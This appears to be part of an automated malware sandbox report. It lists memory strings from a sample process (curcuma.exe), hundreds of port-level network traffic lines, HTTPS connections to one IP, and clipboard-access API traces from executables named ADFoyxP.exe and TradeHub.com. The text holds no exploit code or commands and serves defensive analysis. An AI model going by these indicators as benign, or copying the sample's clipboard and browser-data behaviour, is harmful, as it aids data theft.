Source: curcuma.exe, 00000025.00000003.1891447354.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2038350228.0000012CE2C1E000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1803251253.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comreport-to:
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comreport-to:_dk_https://msn.com
Source: curcuma.exe, 00000025.00000003.1891540114.0000012CE2C43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comsec-fetch-sitesame-sitesec-fetch-modecorssec-fetch-destemptyrefererhttps://ntp.ms
Source: curcuma.exe, 00000025.00000003.2010925300.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616351848.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2051938064.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1604475755.0000012CDD35F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1627781449.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1923866933.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2058966823.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616886676.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2023877190.0000012CDD346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odvr.nic.cz/doh
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pki.goog/repository/0
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://public.dns.iij.jp/
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://public.dns.iij.jp/dns-query
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sapphire.azureedge.net
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C22000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1719954053.0000012CE2C0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt/
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txtD
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com/
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com;
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://srtb.msn.com/auction
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.pnX
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://substrate.pnXrp
Source: curcuma.exe, 00000025.00000003.1922512788.0000012CE2E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/en-GB/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=fire
Source: curcuma.exe, 00000025.00000003.1922512788.0000012CE2E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/en-GB/products/firefoxgro.allizom.troppus.
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.ssl.ak.dynamic.tiles.virtualearth.net
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://titlehub.xboxlive.com/users/
Source: curcuma.exe, 00000025.00000003.1717845361.0000012CE2C1A000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1740198504.0000012CDEEDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: curcuma.exe, 00000025.00000003.1717845361.0000012CE2C1A000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1740198504.0000012CDEEDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://user.auth.xboxlive.com/user/authenticate
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: curcuma.exe, 00000025.00000003.1717845361.0000012CE2C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/:
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/Download
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
Source: curcuma.exe, 00000025.00000003.1892621877.0000012CDEE75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1719954053.0000012CE2C22000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1719954053.0000012CE2C0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrow
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n
Source: curcuma.exe, 00000025.00000003.1717845361.0000012CE2C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: curcuma.exe, 00000025.00000003.1740198504.0000012CDEEDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=eicar
Source: curcuma.exe, 00000025.00000003.1922512788.0000012CE2E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/about/gro.allizom.www.
Source: curcuma.exe, 00000025.00000003.1922512788.0000012CE2E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/contribute/gro.allizom.www.
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
Source: curcuma.exe, 00000025.00000003.1922512788.0000012CE2E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/central/gro.allizom.www.
Source: curcuma.exe, 00000025.00000003.1922512788.0000012CE2E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/privacy/firefox/gro.allizom.www.
Source: curcuma.exe, 00000025.00000003.1922512788.0000012CE2E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: curcuma.exe, 00000025.00000003.1922512788.0000012CE2E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpgk
Source: curcuma.exe, 00000025.00000003.1922512788.0000012CE2E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.nic.cz/odvr/
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.quad9.net/home/privacy/
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/xsts/authorize
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52239
Source: unknownNetwork traffic detected: HTTP traffic on port 60523 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50298
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52477
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52235
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56953
Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52421 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52924
Source: unknownNetwork traffic detected: HTTP traffic on port 55366 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50423 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51491 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63141
Source: unknownNetwork traffic detected: HTTP traffic on port 57794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56724
Source: unknownNetwork traffic detected: HTTP traffic on port 54688 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62579 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60782
Source: unknownNetwork traffic detected: HTTP traffic on port 60701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49608
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64228
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50757
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51492 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56735
Source: unknownNetwork traffic detected: HTTP traffic on port 57795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52133
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59576
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62854
Source: unknownNetwork traffic detected: HTTP traffic on port 65135 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55770
Source: unknownNetwork traffic detected: HTTP traffic on port 63823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60430
Source: unknownNetwork traffic detected: HTTP traffic on port 61447 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64600 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49335 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63141 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52147
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54688
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64923
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63951
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53408
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62460 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55445 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56917
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65076
Source: unknownNetwork traffic detected: HTTP traffic on port 64228 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64606 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62115
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53652
Source: unknownNetwork traffic detected: HTTP traffic on port 60839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64309
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58312
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55167
Source: unknownNetwork traffic detected: HTTP traffic on port 52147 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62488
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54759
Source: unknownNetwork traffic detected: HTTP traffic on port 50298 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56019
Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54994
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51492
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51491
Source: unknownNetwork traffic detected: HTTP traffic on port 56019 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62488 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
Source: unknownNetwork traffic detected: HTTP traffic on port 64184 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51930
Source: unknownNetwork traffic detected: HTTP traffic on port 55543 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49444 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63304 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64562
Source: unknownNetwork traffic detected: HTTP traffic on port 56092 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64309 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60523
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64184
Source: unknownNetwork traffic detected: HTTP traffic on port 60909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58979
Source: unknownNetwork traffic detected: HTTP traffic on port 56752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49608 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49335
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
Source: unknownNetwork traffic detected: HTTP traffic on port 59595 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
Source: unknownNetwork traffic detected: HTTP traffic on port 56917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 54336 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59842
Source: unknownNetwork traffic detected: HTTP traffic on port 52235 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53652 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60701
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60940
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
Source: unknownNetwork traffic detected: HTTP traffic on port 55770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49444
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62460
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50473
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55366
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62579
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60398
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57795
Source: unknownNetwork traffic detected: HTTP traffic on port 54759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60837
Source: unknownNetwork traffic detected: HTTP traffic on port 60842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50473 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63304
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62578
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 54214 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49674
Source: unknownNetwork traffic detected: HTTP traffic on port 64562 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52421
Source: unknownNetwork traffic detected: HTTP traffic on port 56309 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60840
Source: unknownNetwork traffic detected: HTTP traffic on port 59576 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60842
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52133 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54214
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55543
Source: unknownNetwork traffic detected: HTTP traffic on port 52477 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54336
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59595
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
Source: unknownNetwork traffic detected: HTTP traffic on port 55167 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 54994 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60909
Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52167
Source: unknownNetwork traffic detected: HTTP traffic on port 52239 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50423
Source: unknownNetwork traffic detected: HTTP traffic on port 59373 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56092
Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55445
Source: unknownNetwork traffic detected: HTTP traffic on port 62578 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61447
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59373
Source: unknownNetwork traffic detected: HTTP traffic on port 52167 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52866
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53408 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56309
Source: unknownNetwork traffic detected: HTTP traffic on port 61848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62115 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65076 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64606
Source: unknownNetwork traffic detected: HTTP traffic on port 60837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60398 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60430 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65135
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64600
Source: unknownNetwork traffic detected: HTTP traffic on port 50757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64722
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49726 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:62579 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:60783 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:51492 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:57795 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:60838 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:60839 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:60840 version: TLS 1.2
Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0082F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,23_2_0082F7C7
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0082F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,23_2_0082F55C
